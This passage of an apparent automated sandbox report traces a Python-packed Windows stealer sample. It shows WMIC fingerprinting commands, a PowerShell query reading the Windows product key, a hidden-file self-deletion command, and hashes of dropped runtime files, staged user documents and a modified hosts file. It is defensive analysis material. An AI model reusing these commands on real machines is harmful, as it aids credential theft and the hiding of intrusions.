                                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                          3⤵
                                                                            PID:4500
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic computersystem get totalphysicalmemory
                                                                              4⤵
                                                                                PID:3168
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                              3⤵
                                                                                PID:4072
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic csproduct get uuid
                                                                                  4⤵
                                                                                    PID:1168
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                  3⤵
                                                                                    PID:2584
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                      4⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4040
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                    3⤵
                                                                                      PID:544
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic path win32_VideoController get name
                                                                                        4⤵
                                                                                        • Detects videocard installed
                                                                                        PID:3176
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                      3⤵
                                                                                        PID:312
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                          4⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4452
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\.net.exe""
                                                                                        3⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        PID:4988
                                                                                        • C:\Windows\system32\PING.EXE
                                                                                          ping localhost -n 3
                                                                                          4⤵
                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                          • Runs ping.exe
                                                                                          PID:1572

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v15

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                    Filesize

                                                                                    2KB

                                                                                    MD5

                                                                                    d85ba6ff808d9e5444a4b369f5bc2730

                                                                                    SHA1

                                                                                    31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                    SHA256

                                                                                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                    SHA512

                                                                                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    944B

                                                                                    MD5

                                                                                    d28a889fd956d5cb3accfbaf1143eb6f

                                                                                    SHA1

                                                                                    157ba54b365341f8ff06707d996b3635da8446f7

                                                                                    SHA256

                                                                                    21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                    SHA512

                                                                                    0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    944B

                                                                                    MD5

                                                                                    15dde0683cd1ca19785d7262f554ba93

                                                                                    SHA1

                                                                                    d039c577e438546d10ac64837b05da480d06bf69

                                                                                    SHA256

                                                                                    d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                                                                    SHA512

                                                                                    57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    116c74852c74ceee47dacf6ddd82135f

                                                                                    SHA1

                                                                                    1f6056ba03a4b679a4163086e844945a7477445a

                                                                                    SHA256

                                                                                    bf31d7b80253049ac9f8485cddcb074ecdb1ee69f95c0c1a7d916e2c81f0355c

                                                                                    SHA512

                                                                                    8949362e2ed0fad6416d7de03fb3c0170521dda3a25952dc17003bac7b6ff976991fd959809e7b736d6199c5b7048d7339232e0b6a831b9031c90536adff3e11

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    3cdcd330fb3d944df032b546edd561aa

                                                                                    SHA1

                                                                                    5a2aa26a0cae93039e3ca1b3b64cf6e149392a46

                                                                                    SHA256

                                                                                    b514617798b8cd3a6fd74b52dcf734f273774fbb45f2628ea838efa901a01c06

                                                                                    SHA512

                                                                                    293638c9f53cf54957ee5464a6412797a5fa28a8aceb6b66569ed98326c3a507d6f8ef3ec4e282ffe9dec98204e8230918cec62c4a0b10efadf8a2b8d007970f

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp

                                                                                    Filesize

                                                                                    1KB

                                                                                    MD5

                                                                                    b977fd8fd8240adb7bf8e170f106dcf8

                                                                                    SHA1

                                                                                    70a2de4cee38cb1de9998d7c98b996757f8d7226

                                                                                    SHA256

                                                                                    1683991cf89738235f9cee63bcc5927eef851f6d75ba6fbd4b857adf0391c266

                                                                                    SHA512

                                                                                    a2844313e32b413071e4b02680ed0e0e364ac9f02e332a1652911988ed995e63e15fd508416916b8a8d2ee499f9f1c02e42053938c29485bb6094956f2c82ab6

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\VCRUNTIME140.dll

                                                                                    Filesize

                                                                                    106KB

                                                                                    MD5

                                                                                    870fea4e961e2fbd00110d3783e529be

                                                                                    SHA1

                                                                                    a948e65c6f73d7da4ffde4e8533c098a00cc7311

                                                                                    SHA256

                                                                                    76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

                                                                                    SHA512

                                                                                    0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_bz2.pyd

                                                                                    Filesize

                                                                                    48KB

                                                                                    MD5

                                                                                    83b5d1943ac896a785da5343614b16bc

                                                                                    SHA1

                                                                                    9d94b7f374030fed7f6e876434907561a496f5d9

                                                                                    SHA256

                                                                                    bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a

                                                                                    SHA512

                                                                                    5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_ctypes.pyd

                                                                                    Filesize

                                                                                    58KB

                                                                                    MD5

                                                                                    7ecc651b0bcf9b93747a710d67f6c457

                                                                                    SHA1

                                                                                    ebb6dcd3998af9fff869184017f2106d7a9c18f3

                                                                                    SHA256

                                                                                    b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a

                                                                                    SHA512

                                                                                    1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_decimal.pyd

                                                                                    Filesize

                                                                                    106KB

                                                                                    MD5

                                                                                    0cfe09615338c6450ac48dd386f545fd

                                                                                    SHA1

                                                                                    61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe

                                                                                    SHA256

                                                                                    a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3

                                                                                    SHA512

                                                                                    42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_hashlib.pyd

                                                                                    Filesize

                                                                                    35KB

                                                                                    MD5

                                                                                    7edb6c172c0e44913e166abb50e6fba6

                                                                                    SHA1

                                                                                    3f8c7d0ff8981d49843372572f93a6923f61e8ed

                                                                                    SHA256

                                                                                    258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531

                                                                                    SHA512

                                                                                    2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_lzma.pyd

                                                                                    Filesize

                                                                                    85KB

                                                                                    MD5

                                                                                    71f0b9f90aa4bb5e605df0ea58673578

                                                                                    SHA1

                                                                                    c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e

                                                                                    SHA256

                                                                                    d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535

                                                                                    SHA512

                                                                                    fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_queue.pyd

                                                                                    Filesize

                                                                                    25KB

                                                                                    MD5

                                                                                    f1e7c157b687c7e041deadd112d61316

                                                                                    SHA1

                                                                                    2a7445173518a342d2e39b19825cf3e3c839a5fe

                                                                                    SHA256

                                                                                    d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339

                                                                                    SHA512

                                                                                    982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_socket.pyd

                                                                                    Filesize

                                                                                    43KB

                                                                                    MD5

                                                                                    57dc6a74a8f2faaca1ba5d330d7c8b4b

                                                                                    SHA1

                                                                                    905d90741342ac566b02808ad0f69e552bb08930

                                                                                    SHA256

                                                                                    5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca

                                                                                    SHA512

                                                                                    5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_sqlite3.pyd

                                                                                    Filesize

                                                                                    56KB

                                                                                    MD5

                                                                                    72a0715cb59c5a84a9d232c95f45bf57

                                                                                    SHA1

                                                                                    3ed02aa8c18f793e7d16cc476348c10ce259feb7

                                                                                    SHA256

                                                                                    d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad

                                                                                    SHA512

                                                                                    73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\_ssl.pyd

                                                                                    Filesize

                                                                                    62KB

                                                                                    MD5

                                                                                    8f94142c7b4015e780011c1b883a2b2f

                                                                                    SHA1

                                                                                    c9c3c1277cca1e8fe8db366ca0ecb4a264048f05

                                                                                    SHA256

                                                                                    8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c

                                                                                    SHA512

                                                                                    7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\base_library.zip

                                                                                    Filesize

                                                                                    1.4MB

                                                                                    MD5

                                                                                    1c9a020e8bfc99a77f51c7d5ceb937f1

                                                                                    SHA1

                                                                                    9b2c6f0c4d16ac0b69e5232648b6e6c5df39cd9c

                                                                                    SHA256

                                                                                    2ce10a77f29612f9afd3fb21baaf38162fdc484174aec051a32eeaef28ce8b37

                                                                                    SHA512

                                                                                    98312712c4be133d979b9699e661c451cd8c27ae4c5abc295c359fd857d20b3fde55e6555bdd2230d580903bb230798fba2c72381b263327f5d0820d28ddfbea

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\blank.aes

                                                                                    Filesize

                                                                                    122KB

                                                                                    MD5

                                                                                    595e69a6f1e64c234faa792b91bd7339

                                                                                    SHA1

                                                                                    899cb94b1af4eb4b9993dc26fbf329fbc87d5a6f

                                                                                    SHA256

                                                                                    1384ab1508ee134d7cb9d78ceed1b69d81d3c02bca70d187e28c526593087086

                                                                                    SHA512

                                                                                    d27831845125bc23f76edca2639d8441f98d44e7d71b96ac7414f61d53b6c6d8f54afc39771d7226f5dbf7841fe90e35421f851b79a128ae02b3310000fa0f06

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\libcrypto-1_1.dll

                                                                                    Filesize

                                                                                    1.1MB

                                                                                    MD5

                                                                                    e5aecaf59c67d6dd7c7979dfb49ed3b0

                                                                                    SHA1

                                                                                    b0a292065e1b3875f015277b90d183b875451450

                                                                                    SHA256

                                                                                    9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1

                                                                                    SHA512

                                                                                    145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\libffi-8.dll

                                                                                    Filesize

                                                                                    27KB

                                                                                    MD5

                                                                                    87786718f8c46d4b870f46bcb9df7499

                                                                                    SHA1

                                                                                    a63098aabe72a3ed58def0b59f5671f2fd58650b

                                                                                    SHA256

                                                                                    1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33

                                                                                    SHA512

                                                                                    3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\libssl-1_1.dll

                                                                                    Filesize

                                                                                    203KB

                                                                                    MD5

                                                                                    7bcb0f97635b91097398fd1b7410b3bc

                                                                                    SHA1

                                                                                    7d4fc6b820c465d46f934a5610bc215263ee6d3e

                                                                                    SHA256

                                                                                    abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e

                                                                                    SHA512

                                                                                    835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\python311.dll

                                                                                    Filesize

                                                                                    1.6MB

                                                                                    MD5

                                                                                    1e76961ca11f929e4213fca8272d0194

                                                                                    SHA1

                                                                                    e52763b7ba970c3b14554065f8c2404112f53596

                                                                                    SHA256

                                                                                    8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0

                                                                                    SHA512

                                                                                    ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe

                                                                                    Filesize

                                                                                    615KB

                                                                                    MD5

                                                                                    9c223575ae5b9544bc3d69ac6364f75e

                                                                                    SHA1

                                                                                    8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                    SHA256

                                                                                    90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                    SHA512

                                                                                    57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\rarreg.key

                                                                                    Filesize

                                                                                    456B

                                                                                    MD5

                                                                                    4531984cad7dacf24c086830068c4abe

                                                                                    SHA1

                                                                                    fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                    SHA256

                                                                                    58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                    SHA512

                                                                                    00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\select.pyd

                                                                                    Filesize

                                                                                    25KB

                                                                                    MD5

                                                                                    938c814cc992fe0ba83c6f0c78d93d3f

                                                                                    SHA1

                                                                                    e7c97e733826e53ff5f1317b947bb3ef76adb520

                                                                                    SHA256

                                                                                    9c9b62c84c2373ba509c42adbca01ad184cd525a81ccbcc92991e0f84735696e

                                                                                    SHA512

                                                                                    2f175f575e49de4b8b820171565aedb7474d52ae9914e0a541d994ff9fea38971dd5a34ee30cc570920b8618393fc40ab08699af731005542e02a6a0095691f0

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\sqlite3.dll

                                                                                    Filesize

                                                                                    607KB

                                                                                    MD5

                                                                                    abe8eec6b8876ddad5a7d60640664f40

                                                                                    SHA1

                                                                                    0b3b948a1a29548a73aaf8d8148ab97616210473

                                                                                    SHA256

                                                                                    26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d

                                                                                    SHA512

                                                                                    de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29

                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI31442\unicodedata.pyd

                                                                                    Filesize

                                                                                    295KB

                                                                                    MD5

                                                                                    908e8c719267692de04434ab9527f16e

                                                                                    SHA1

                                                                                    5657def35fbd3e5e088853f805eddd6b7b2b3ce9

                                                                                    SHA256

                                                                                    4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239

                                                                                    SHA512

                                                                                    4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a

                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnwqsnqx.oiu.ps1

                                                                                    Filesize

                                                                                    60B

                                                                                    MD5

                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                    SHA1

                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                    SHA256

                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                    SHA512

                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                  • C:\Users\Admin\AppData\Local\Temp\zktxfav3\zktxfav3.dll

                                                                                    Filesize

                                                                                    4KB

                                                                                    MD5

                                                                                    eeb47b4e7512b3ac456a076c11a179b9

                                                                                    SHA1

                                                                                    49acd44e77347a3d72ad009d959d185b25dff79b

                                                                                    SHA256

                                                                                    725b0fa89c11311b6a1f6e4194a2529c446b30c0e2cbe2f3e29b5f43df2d2986

                                                                                    SHA512

                                                                                    886d9f4a0576c4efa8b5122654d699365ec0d2a28c282f042585738b234c7d6f8b73e7d60dc54a5fff33c5181f4f736bf0dbca038a19464b706220cb25eca734

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Desktop\ApproveOpen.mp3

                                                                                    Filesize

                                                                                    202KB

                                                                                    MD5

                                                                                    0372774b844a2e4a098bf66d6bf87e9f

                                                                                    SHA1

                                                                                    bebdc4a19b914719d03188135069cf078744d16d

                                                                                    SHA256

                                                                                    654baa9a41dee5a63635b9a2a5281837980f67f15ae03c1fc0220d7ac52b13cc

                                                                                    SHA512

                                                                                    8261020bfae158ce50d76b28f4c51e706e0371ec488186d7d1bafb0032f82cc0a955b7d05ae6dd09fd01e5b6373a1b4a5444efc23f7ef35d7e46b3f0fd80403e

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Desktop\BackupRepair.avi

                                                                                    Filesize

                                                                                    189KB

                                                                                    MD5

                                                                                    6464799b8e34e772755333b75307bfa4

                                                                                    SHA1

                                                                                    0d271eb3a0c95943cbc273879bf7873743992832

                                                                                    SHA256

                                                                                    555e51a40c77625b32831733fa16548ac58871a062f938a3cc4043c364b3a49e

                                                                                    SHA512

                                                                                    6327668ee988cb860cee75ec3c8dbc125b00c2e81096bfba56a2362cea58d31b552e639d8cb7ebf80e816f99969f2c2e543cf20d474762f4258f5eb0012585b1

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Desktop\GroupInstall.mp3

                                                                                    Filesize

                                                                                    104KB

                                                                                    MD5

                                                                                    da110ac5e5745325626be6305676235c

                                                                                    SHA1

                                                                                    2f36ca2b439663a5ff48c690b675b98bbc16f35c

                                                                                    SHA256

                                                                                    369e6d048a6f83fafb444ab5d1c3f96eff301baa58ab0a0704a5d377a33a407f

                                                                                    SHA512

                                                                                    b2cc3796cc6fdf2a002dc0d0805c42166f6def67029535e0ed23fce9078c77a6355364506183114e4952981d9fb83924932ed3f4c7a360603d5bcd8b68fdd592

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Desktop\JoinProtect.docx

                                                                                    Filesize

                                                                                    14KB

                                                                                    MD5

                                                                                    6c2e12ea75f721915f322c82d1bf1640

                                                                                    SHA1

                                                                                    88d877e2a4d6792c4fefd2e28093421fd7bad158

                                                                                    SHA256

                                                                                    950acbfe9eb0e91aaca97b45769f28b359db6e94dfa92afa471e237f662eb25b

                                                                                    SHA512

                                                                                    cd4750b681e4a3e89a1cffaa0c21fa7d471ed6665b5ce8a6b4afe0d47515da02f97ddb163add089e83b7e6343c7bd7508728e5e4b9e98c7bfa6372ae67e3d7ca

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Desktop\ShowStop.png

                                                                                    Filesize

                                                                                    241KB

                                                                                    MD5

                                                                                    824a7b2bd65fc81e10e7da2663515bfa

                                                                                    SHA1

                                                                                    1d049677d262d062390db233b706e2067d698dfe

                                                                                    SHA256

                                                                                    c2c25325f92ffe23248df35aad6d303c3dcc0fd83991a05e0c0680645cfbc69d

                                                                                    SHA512

                                                                                    bbafd8cd0927fa03f706aa3332312f75be4ee70b1d22c7c10b47a5da800e12c6790758236a1d83e9fc83179b917d625b63601179e6886b3b840863ab1bb470e6

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Desktop\UninstallWait.mp4

                                                                                    Filesize

                                                                                    150KB

                                                                                    MD5

                                                                                    8d2fc7bf13987214d431ec174dce547c

                                                                                    SHA1

                                                                                    9b4b5a348c14560f17ec7683cf4f107421b986f7

                                                                                    SHA256

                                                                                    6facb2f948235569bf0b366c02122a0d22fe0b8d434fec26db19fd0e40a0ec1a

                                                                                    SHA512

                                                                                    e93855b31b228103f05c44eca8e93288a9e6ff33271999c0d64c2041a45409521288e8ec27fc4777f9e0af335007f72649b3b0d555a20b9040af6f03969803c6

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Desktop\UnprotectRedo.docx

                                                                                    Filesize

                                                                                    21KB

                                                                                    MD5

                                                                                    177b27a63e7d054b54d3848070526dba

                                                                                    SHA1

                                                                                    a60043d8825e590f6353f7082bac8e4ca2db570c

                                                                                    SHA256

                                                                                    2fdae0e4e1031076ea7a8fa6b03aa0624a299ee938d63ece5bacd33166dbccf9

                                                                                    SHA512

                                                                                    7397cbf261db1e19a72befcc565c899841b3c8af37a4d926637bc9e0b209bfc13bc678b6a9c9f1c45d903aa284430d2da4d7340b9c9dfbad5f95f3fe6d76bbc9

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Documents\BlockPing.xlsx

                                                                                    Filesize

                                                                                    14KB

                                                                                    MD5

                                                                                    aaaef99b286486227f1aac81d25225bb

                                                                                    SHA1

                                                                                    0f6c2342e121cc97b2220bff620ec2ff96d49020

                                                                                    SHA256

                                                                                    f1888054ad8e6a57bd4a81cdd15a2e3bf85d47e4abf940e578f7e5f743d4932d

                                                                                    SHA512

                                                                                    e28c5e628a6790990d9c6af9e617587166f9762d4388077cf683cf854405a8c18002bb22350f0e7ce2b584da008147fbe86268daa637500a73dc2159596657c5

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Documents\DebugRestart.docx

                                                                                    Filesize

                                                                                    14KB

                                                                                    MD5

                                                                                    9bd0c34f8b1d9873b58ed135b5e8f86c

                                                                                    SHA1

                                                                                    c5b407eedcbdb1419bab4296d8e737e1b1b25ec1

                                                                                    SHA256

                                                                                    987c7bf2e2d8aec698d81f40109c07ad66ffb84db4b6c521dace714ddde1f899

                                                                                    SHA512

                                                                                    91a1a8f64b97665ce4de04d7506018d4110866c962192a0688f3b9ef77d470d7bdc790d0763bb6a012659d516430a6b1d1e0f021b2162236646a35e6c2f18f30

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Documents\DenyRedo.csv

                                                                                    Filesize

                                                                                    415KB

                                                                                    MD5

                                                                                    9d2b4f874e922e475e5f172d06cbb355

                                                                                    SHA1

                                                                                    65eadfc84236b5cba6c05267af6ef52c57936f3d

                                                                                    SHA256

                                                                                    c03aaec1536500d307f8f4ff3f63016ccacf59c94455374374c9de201c017eb6

                                                                                    SHA512

                                                                                    d2fda329b5dcf4882c56254acb86c21ef444c74cba8df9517977f87f2bd40ed91f854fe143c8066f221c543a6867e1ab4b480c304377b8e798be16941f7fe402

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Documents\OptimizeDebug.xlsx

                                                                                    Filesize

                                                                                    490KB

                                                                                    MD5

                                                                                    80beb0ad755cbd7d24177eb39668f9f2

                                                                                    SHA1

                                                                                    5072ef2651ddd81de89865065b69f9737cadd49f

                                                                                    SHA256

                                                                                    b5d8b74f1c6cbbac11739421b6841b3e33ae406715bf10f2a85bcdc05143be75

                                                                                    SHA512

                                                                                    b98e37976269ac59a22a7ec2143864f29689349389574aa5fbd2a52faba7fb73c33b018d204d73d77c6cb3a2669c6f98a3e0125bb6a3ea4f8abeb74a6274264a

                                                                                  • C:\Users\Admin\AppData\Local\Temp\‍    ‌ ‌ ​\Common Files\Documents\ResumeDebug.xlsx

                                                                                    Filesize

                                                                                    14KB

                                                                                    MD5

                                                                                    c3de5a6e854e1b072e5fde3edb6484e1

                                                                                    SHA1

                                                                                    4610e87451d17908b835def55eed5dd318d0e3d0

                                                                                    SHA256

                                                                                    5d20c14a613a1f8376e7cd94ccabefd20a6b068406eaf684a112516d1f4849b3

                                                                                    SHA512

                                                                                    93b0a1ca83d368437e86e84b192ebfe5c8fc5baa6f68266f7c43fdb8f71d56009521a998c5e82ababb88bdc514dcfe4fde08ce95ae6162b29e24e059ecec8b37

                                                                                  • C:\Windows\System32\drivers\etc\hosts

                                                                                    Filesize

                                                                                    2KB

                                                                                    MD5

                                                                                    f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                    SHA1

                                                                                    e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                    SHA256

                                                                                    a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                    SHA512

                                                                                    c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\zktxfav3\CSCC3F96F97EBFB4C23A6922D3A8D19A8D7.TMP

                                                                                    Filesize

                                                                                    652B

                                                                                    MD5

                                                                                    95a0f5c3e8804901c67e270dc4c7895a

                                                                                    SHA1

                                                                                    f5e60c270d6e921ef8515a81119fb0e74c265526

                                                                                    SHA256

                                                                                    798bcaea919343a624f1e3bca4dca54ba5bd91c1621cfd950b44281c34a9e9ed

                                                                                    SHA512

                                                                                    9b3201b3789e7a0c55dbdb16fd297383c9185e5953a620fa98699cef251208ac3522e3179f266faa122149824150e473cd3bfed2ff24b38aa3e16a5b2669133c

